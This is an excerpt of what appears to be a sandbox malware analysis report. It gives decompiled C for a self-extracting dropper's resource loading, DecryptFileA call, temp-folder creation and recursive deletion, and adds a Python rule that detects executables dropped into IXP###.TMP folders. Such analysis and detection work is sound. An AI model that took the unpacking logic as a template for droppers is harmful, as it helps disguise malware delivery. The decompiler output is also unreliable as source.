                                                                                                                                                                                                                                    0x0040515f

APIs
  • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
  • Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
  • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
  • Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
  • Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
  • Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
  • Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF
• FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00404FFE
• LoadResource.KERNEL32(00000000,00000000), ref: 00405006
• LockResource.KERNEL32(00000000), ref: 0040500D
• GetDlgItem.USER32(00000000,00000842), ref: 00405030
• ShowWindow.USER32(00000000), ref: 00405037
• GetDlgItem.USER32(00000841,00000005), ref: 0040504A
• ShowWindow.USER32(00000000), ref: 00405051
• FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00405111
• SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00405159
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
• String ID: *MEMCAB$CABINET
• API String ID: 1305606123-2642027498
• Opcode ID: 09a44ef4b14b10cb8208e50229d1ed21c6988b88aa67c305168c5717d0b677ef
• Instruction ID: c7e9636301b6909bf0cfcc4fade7c16197fcaa171c04f7cf8e0346fe02231bd7
• Opcode Fuzzy Hash: 09a44ef4b14b10cb8208e50229d1ed21c6988b88aa67c305168c5717d0b677ef
• Instruction Fuzzy Hash: 6F31C9F0B40706BBE7105F61AF89F67365CE748755F14403AFA41BA2E2DABC9C108A5D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph of function 00402F1D (rendered as an image in the original report): basic blocks 402f1d through 4030b7, with edges annotated by the subcalls and APIs reached from each block (E00405164, E004055A0, GetSystemDirectoryA, LoadLibraryA, GetProcAddress, DecryptFileA, FreeLibrary, SetCurrentDirectoryA and others).]
C-Code - Quality: 82%
			E00402F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x408004; // 0x8f135e3b
				_v8 = _t9 ^ _t46; // stack security cookie (checked again on the return path)
				if( *0x408a38 != 0) {
					L5:
					_t11 = E00405164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00406CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E004055A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						// Build "<system directory>\advapi32.dll" and load it by full path,
						// then resolve DecryptFileA dynamically instead of importing it.
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0040658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								// Call DecryptFileA on the temporary extraction directory
								 *0x40a288("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29"); // __fastfail: security-check failure path
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x408a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							// Change into the temporary extraction directory before unpacking
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x408a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
                                                                                                                                                                                                                                    									__eflags =  *0x408d48 & 0x000000c0;
                                                                                                                                                                                                                                    									if(( *0x408d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                    										_t41 =  *0x409a40; // 0x3, executed
                                                                                                                                                                                                                                    										_t26 = E0040256D(_t41); // executed
                                                                                                                                                                                                                                    										_t44 = _t26;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t22 =  *0x408a24; // 0x0
                                                                                                                                                                                                                                    									 *0x409a44 = _t44;
                                                                                                                                                                                                                                    									__eflags = _t22;
                                                                                                                                                                                                                                    									if(_t22 != 0) {
                                                                                                                                                                                                                                    										L26:
                                                                                                                                                                                                                                    										__eflags =  *0x408a38;
                                                                                                                                                                                                                                    										if( *0x408a38 == 0) {
                                                                                                                                                                                                                                    											__eflags = _t22;
                                                                                                                                                                                                                                    											if(__eflags == 0) {
                                                                                                                                                                                                                                    												E00404169(__eflags);
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t12 = 1;
                                                                                                                                                                                                                                    										goto L17;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										__eflags =  *0x409a30 - _t22; // 0x0
                                                                                                                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                                                                                                                    											goto L26;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t25 = E00403BA2(); // executed
                                                                                                                                                                                                                                    										__eflags = _t25;
                                                                                                                                                                                                                                    										if(_t25 == 0) {
                                                                                                                                                                                                                                    											goto L16;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t22 =  *0x408a24; // 0x0
                                                                                                                                                                                                                                    										goto L26;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t27 = E00403B26(_t40, _t44);
                                                                                                                                                                                                                                    								__eflags = _t27;
                                                                                                                                                                                                                                    								if(_t27 == 0) {
                                                                                                                                                                                                                                    									goto L16;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t43 = 0x4bc;
                                                                                                                                                                                                                                    							E004044B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                    							 *0x409124 = E00406285();
                                                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t59 =  *0x409a30 - _t44; // 0x0
                                                                                                                                                                                                                                    						if(_t59 != 0) {
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t30 = E0040621E(); // executed
                                                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t49 =  *0x408a24;
                                                                                                                                                                                                                                    				if( *0x408a24 != 0) {
                                                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                                                    					_t34 = E00403A3F(_t51);
                                                                                                                                                                                                                                    					_t52 = _t34;
                                                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(E004051E5(_t49) == 0) {
                                                                                                                                                                                                                                    					goto L16;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t51 =  *0x408a38;
                                                                                                                                                                                                                                    				if( *0x408a38 != 0) {
                                                                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L4;
                                                                                                                                                                                                                                    			}
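The decompiled fragment above shows the dropper changing its working directory into C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\, the folder an IExpress/wextract self-extracting package unpacks into. The point a defender can act on is the folder name itself: executables written to, or started from, an IXP###.TMP directory are worth an alert. Below is an added example, not part of the Joe Sandbox report, that runs that check over a few constructed file-create and process-create events. The key=value event layout, the field names (EventType, Image, TargetFilename, ParentImage) and the sample paths are assumptions for the demonstration, not a real Sysmon export; the check is written for any three-digit IXP folder rather than only the IXP000.TMP seen in this run.

```python
import re
from typing import Dict, List, Optional

# wextract.exe names its extraction folder %TEMP%\IXP%03d.TMP, so match any
# three-digit instance, not only the IXP000.TMP observed in this analysis.
IXP_DIR = re.compile(r"\\IXP\d{3}\.TMP\\", re.IGNORECASE)

# File types that should not normally be written to or launched from that folder.
PAYLOAD_EXT = (".exe", ".dll", ".scr", ".bat", ".cmd", ".vbs", ".js", ".ps1")

# Constructed sample events in an assumed key=value layout (not a real Sysmon export).
SAMPLE_LOG = [
    r'EventType=FileCreate Image="C:\Users\hardz\Desktop\dropper.exe" TargetFilename="C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\payload1.exe"',
    r'EventType=FileCreate Image="C:\Windows\explorer.exe" TargetFilename="C:\Users\hardz\Documents\notes.txt"',
    r'EventType=FileCreate Image="C:\Users\hardz\Desktop\dropper.exe" TargetFilename="C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\readme.txt"',
    r'EventType=ProcessCreate Image="C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\stage2.exe" ParentImage="C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\payload1.exe"',
    r'EventType=ProcessCreate Image="C:\Windows\System32\cmd.exe" ParentImage="C:\Windows\explorer.exe"',
]

# key=value or key="value with spaces"
_FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> Dict[str, str]:
    """Split one event line into a dict of its fields."""
    fields: Dict[str, str] = {}
    for m in _FIELD.finditer(line):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return fields


def ixp_payload_path(event: Dict[str, str]) -> Optional[str]:
    """Return the offending path when a payload-type file is created in, or a
    process is started from, an IXP###.TMP folder; otherwise None."""
    kind = event.get("EventType")
    if kind == "FileCreate":
        path = event.get("TargetFilename", "")
    elif kind == "ProcessCreate":
        path = event.get("Image", "")
    else:
        return None
    if IXP_DIR.search(path) and path.lower().endswith(PAYLOAD_EXT):
        return path
    return None


def find_ixp_activity(lines) -> List[Dict[str, str]]:
    """Run the check over an iterable of event lines and collect the hits."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        ev = parse_event(line)
        path = ixp_payload_path(ev)
        if path is not None:
            hits.append({"type": ev["EventType"], "path": path, "image": ev.get("Image", "")})
    return hits


if __name__ == "__main__":
    for hit in find_ixp_activity(SAMPLE_LOG):
        print(f"{hit['type']:13} {hit['path']}")
```

Of the five constructed events only two fire: the executable dropped into IXP000.TMP and the process started from IXP001.TMP. The readme.txt written to the same folder is ignored on purpose, since legitimate IExpress packages also unpack plain files there; tightening the rule to any file in that directory is a choice to make per environment.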

Disassembly address column for this function (only the addresses survived extraction; the instruction text is absent): 0x00402f1d 0x00402f28 0x00402f2f 0x00402f3d 0x00402f6c 0x00402f6c 0x00402f71 0x00402f73 0x00403041 0x00403041 0x00403043 0x00403053 0x00403053 0x00402f79 0x00402f80 0x00000000 0x00402f86 0x00402f86 0x00402f93 0x00402f9e 0x00402fa0 0x00402fa6 0x00402fb8 0x00402fba 0x00402fbe 0x00402fc6 0x00402fcc 0x00402fd4 0x00402fd6 0x00402fd8 0x00402fe0 0x00402fe6 0x00402fee 0x00402ff0 0x00402ff5 0x00402ff5 0x00402fee 0x00402fd4 0x00402ff8 0x00402ffe 0x00403004 0x00403017 0x0040301c 0x00403024 0x00403054 0x0040305a 0x00403065 0x00403065 0x0040306c 0x0040306e 0x00403075 0x0040307a 0x0040307a 0x0040307c 0x00403081
                                                                                                                                                                                                                                    0x00403087
                                                                                                                                                                                                                                    0x00403089
                                                                                                                                                                                                                                    0x004030a1
                                                                                                                                                                                                                                    0x004030a1
                                                                                                                                                                                                                                    0x004030a9
                                                                                                                                                                                                                                    0x004030ab
                                                                                                                                                                                                                                    0x004030ad
                                                                                                                                                                                                                                    0x004030af
                                                                                                                                                                                                                                    0x004030af
                                                                                                                                                                                                                                    0x004030ad
                                                                                                                                                                                                                                    0x004030b6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040308b
                                                                                                                                                                                                                                    0x0040308b
                                                                                                                                                                                                                                    0x00403091
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403093
                                                                                                                                                                                                                                    0x00403098
                                                                                                                                                                                                                                    0x0040309a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040309c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040309c
                                                                                                                                                                                                                                    0x00403089
                                                                                                                                                                                                                                    0x0040305c
                                                                                                                                                                                                                                    0x00403061
                                                                                                                                                                                                                                    0x00403063
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403063
                                                                                                                                                                                                                                    0x0040302b
                                                                                                                                                                                                                                    0x00403032
                                                                                                                                                                                                                                    0x0040303c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040303c
                                                                                                                                                                                                                                    0x00403006
                                                                                                                                                                                                                                    0x0040300c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040300e
                                                                                                                                                                                                                                    0x00403015
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403015
                                                                                                                                                                                                                                    0x00402f80
                                                                                                                                                                                                                                    0x00402f3f
                                                                                                                                                                                                                                    0x00402f46
                                                                                                                                                                                                                                    0x00402f5f
                                                                                                                                                                                                                                    0x00402f5f
                                                                                                                                                                                                                                    0x00402f64
                                                                                                                                                                                                                                    0x00402f66
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402f66
                                                                                                                                                                                                                                    0x00402f4f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00402f55
                                                                                                                                                                                                                                    0x00402f5d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

APIs
• GetSystemDirectoryA.KERNEL32(?,00000105), ref: 00402F93
• LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00402FB2
• GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00402FC6
• DecryptFileA.ADVAPI32 ref: 00402FE6
• FreeLibrary.KERNEL32(00000000), ref: 00402FF8
• SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040301C
  • Part of subcall function 004051E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00402F4D,?,00000002,00000000), ref: 00405201
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
• API String ID: 2126469477-58291647
• Opcode ID: 06cd3a77e258f2f6014872c6370331c5e6c0375f7d7b6bb2db4781a8fc7ad934
• Instruction ID: dd7a2d248aebac99f1714a49481474325bfd39d927ddb191d2ee86f43da6afaf
• Opcode Fuzzy Hash: 06cd3a77e258f2f6014872c6370331c5e6c0375f7d7b6bb2db4781a8fc7ad934
• Instruction Fuzzy Hash: 9641A270B012059BDB20AF769E4965B3BAC9B44755F10007FA941F26D6EB7C8E80CE6D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 522 405467-405484 523 40548a-405490 call 4053a1 522->523 524 40551c-405528 call 401680 522->524 527 405495-405497 523->527 528 40552d-405539 call 4058c8 524->528 530 405581-405583 527->530 531 40549d-4054c0 call 401781 527->531 536 40553b-405545 CreateDirectoryA 528->536 537 40554d-405552 528->537 533 40558d-40559d call 406ce0 530->533 539 4054c2-4054d8 GetSystemInfo 531->539 540 40550c-40551a call 40658a 531->540 542 405577-40557c call 406285 536->542 543 405547 536->543 544 405554-405557 call 40597d 537->544 545 405585-40558b 537->545 546 4054da-4054dd 539->546 547 4054fe 539->547 540->528 542->530 543->537 553 40555c-40555e 544->553 545->533 551 4054f7-4054fc 546->551 552 4054df-4054e2 546->552 554 405503-405507 call 40658a 547->554 551->554 557 4054f0-4054f5 552->557 558 4054e4-4054e7 552->558 553->545 559 405560-405566 553->559 554->540 557->554 558->540 561 4054e9-4054ee 558->561 559->530 562 405568-405575 RemoveDirectoryA 559->562 561->554 562->530
C-Code - Quality: 75%
			E00405467(CHAR* __ecx, void* __edx, char* _a4) {
				signed int _v8;
				char _v268;
				struct _SYSTEM_INFO _v304;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t10;
				void* _t13;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				signed int _t26;
				void* _t28;
				void* _t29;
				CHAR* _t48;
				signed int _t49;
				intOrPtr _t61;

				_t10 =  *0x408004; // 0x8f135e3b
				_v8 = _t10 ^ _t49;
				_push(__ecx);
				if(__edx == 0) {
					_t48 = 0x4091e4;
					_t42 = 0x104;
					E00401680(0x4091e4, 0x104);
					L14:
					_t13 = E004058C8(_t48); // executed
                                                                                                                                                                                                                                    					if(_t13 != 0) {
                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                    						_t42 = _a4;
                                                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                                                    							 *0x409124 = 0;
                                                                                                                                                                                                                                    							_t14 = 1;
                                                                                                                                                                                                                                    							L24:
                                                                                                                                                                                                                                    							return E00406CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t16 = E0040597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                    						if(_t16 != 0) {
                                                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t61 =  *0x408a20; // 0x0
                                                                                                                                                                                                                                    						if(_t61 != 0) {
                                                                                                                                                                                                                                    							 *0x408a20 = 0;
                                                                                                                                                                                                                                    							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						L22:
                                                                                                                                                                                                                                    						_t14 = 0;
                                                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                    						 *0x409124 = E00406285();
                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *0x408a20 = 1;
                                                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t42 =  &_v268;
                                                                                                                                                                                                                                    				_t20 = E004053A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                    				if(_t20 == 0) {
                                                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_t48 = 0x4091e4;
                                                                                                                                                                                                                                    				E00401781(0x4091e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                    				if(( *0x409a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					_t42 = 0x104;
                                                                                                                                                                                                                                    					E0040658A(_t48, 0x104, 0x401140);
                                                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                    				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                                                    					_push("i386");
                                                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                                                    					E0040658A(_t48, 0x104);
                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t28 = _t26 - 1;
                                                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                                                    					_push("mips");
                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t29 = _t28 - 1;
                                                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                                                    					_push("alpha");
                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t29 != 1) {
                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_push("ppc");
                                                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                                                    			}




















Instruction addresses for the decompiled lines above (0x00000000 marks lines with no mapped instruction):
0x00405472 0x00405479 0x00405481 0x00405484 0x0040551c 0x00405521 0x00405528 0x0040552d
0x0040552f 0x00405539 0x0040554d 0x0040554d 0x00405552 0x00405585 0x00405585 0x0040558b
0x0040558d 0x0040559d 0x0040559d 0x00405557 0x0040555e 0x00000000 0x00000000 0x00405560
0x00405566 0x00405569 0x0040556f 0x0040556f 0x00405581 0x00405581 0x00000000 0x00405581
0x00405545 0x0040557c 0x00000000 0x0040557c 0x00405547 0x00000000 0x00405547 0x0040548a
0x00405490 0x00405497 0x00000000 0x00000000 0x0040549d 0x004054ab 0x004054b4 0x004054c0
0x0040550c 0x00405511 0x00405515 0x00000000 0x00405515 0x004054c9 0x004054d6 0x004054d8
0x004054fe 0x00405503 0x00405507 0x00000000 0x00405507 0x004054da 0x004054dd 0x004054f7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004054f7
                                                                                                                                                                                                                                    0x004054df
                                                                                                                                                                                                                                    0x004054e2
                                                                                                                                                                                                                                    0x004054f0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004054f0
                                                                                                                                                                                                                                    0x004054e7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004054e9
                                                                                                                                                                                                                                    0x00000000

APIs
• GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004054C9
• CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040553D
• RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040556F
  • Part of subcall function 004053A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004053FB
  • Part of subcall function 004053A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405402
  • Part of subcall function 004053A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040541F
  • Part of subcall function 004053A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040542B
  • Part of subcall function 004053A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405434
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
• API String ID: 1979080616-186922987
• Opcode ID: 860b4abba6f2e9196ec0708b34676737e603b7f2e39ec8806f8bda2caedf095c
• Instruction ID: 42d8508e497298c23007889095531b712f90f8dafbad6872354eea9b701dc3d5
• Opcode Fuzzy Hash: 860b4abba6f2e9196ec0708b34676737e603b7f2e39ec8806f8bda2caedf095c
• Instruction Fuzzy Hash: EA313A70700A047BDB105F2A9D04A7F77AAEB81304B14013FAC02F26E5DB7C8E028E8D
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 86%
/* Recursively empties and removes the directory named by __ecx:
   regular files have their attributes reset to NORMAL and are deleted,
   subdirectories (other than "." and "..") are recursed into, and the
   directory itself is removed once the enumeration is finished. */
E00402390(CHAR* __ecx) {
	signed int _v8;                   /* stack cookie */
	char _v276;                       /* path buffer (MAX_PATH = 0x104) */
	char _v280;
	char _v284;
	struct _WIN32_FIND_DATAA _v596;
	struct _WIN32_FIND_DATAA _v604;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t21;
	signed int _t22;
	int _t36;
	void* _t46;
	int _t58;
	void* _t62;
	void* _t63;                       /* find handle */
	CHAR* _t65;                       /* directory path argument */
	void* _t66;
	signed int _t67;
	signed int _t69;

	_t69 = (_t67 & 0xfffffff8) - 0x254;
	_t21 =  *0x408004; // 0x8f135e3b   security cookie
	_t22 = _t21 ^ _t69;
	_v8 = _t21 ^ _t69;
	_t65 = __ecx;
	if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
		/* NULL or empty path: nothing to do */
		L10:
		_pop(_t62);
		_pop(_t66);
		_pop(_t46);
		return E00406CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);  /* cookie check + epilogue */
	} else {
		E00401680( &_v276, 0x104, __ecx);                 /* copy directory path */
		_t58 = 0x104;
		E004016B3( &_v280, 0x104, "*");                   /* append "*" wildcard */
		_t22 = FindFirstFileA( &_v284,  &_v604); // executed
		_t63 = _t22;
		if(_t63 == 0xffffffff) {                          /* INVALID_HANDLE_VALUE */
			goto L10;
		} else {
			goto L3;
		}
		do {
			L3:
			_t58 = 0x104;
			E00401680( &_v276, 0x104, _t65);              /* rebuild base path */
			/* tests FILE_ATTRIBUTE_DIRECTORY (0x10) on the find data */
			if((_v604.ftCreationTime & 0x00000010) == 0) {
				/* regular file: clear read-only etc. (FILE_ATTRIBUTE_NORMAL) and delete */
				_t58 = 0x104;
				E004016B3( &_v276, 0x104,  &(_v596.dwReserved1));
				SetFileAttributesA( &_v280, 0x80);
				DeleteFileA( &_v280);
			} else {
				/* subdirectory: skip "." and "..", otherwise recurse */
				if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
					E004016B3( &_v276, 0x104,  &(_v596.cFileName));
					_t58 = 0x104;
					E0040658A( &_v280, 0x104, 0x401140);
					E00402390( &_v284);
				}
			}
			_t36 = FindNextFileA(_t63,  &_v596); // executed
		} while (_t36 != 0);
		FindClose(_t63); // executed
		_t22 = RemoveDirectoryA(_t65); // executed
		goto L10;
	}
}





















0x00402398
0x0040239e
0x004023a3
0x004023a5
0x004023ae
0x004023b3
0x004024cb
0x004024d2
0x004024d3
0x004024d4
0x004024df
0x004023c2
0x004023d1
0x004023db
0x004023e4
0x004023f6
0x004023fc
0x00402401
0x00000000
0x00000000
0x00000000
0x00000000
0x00402407
0x00402407
0x00402408
0x00402411
0x0040241f
0x0040247a
0x00402483
0x00402495
0x004024a3
0x00402421
0x0040242f
0x00402453
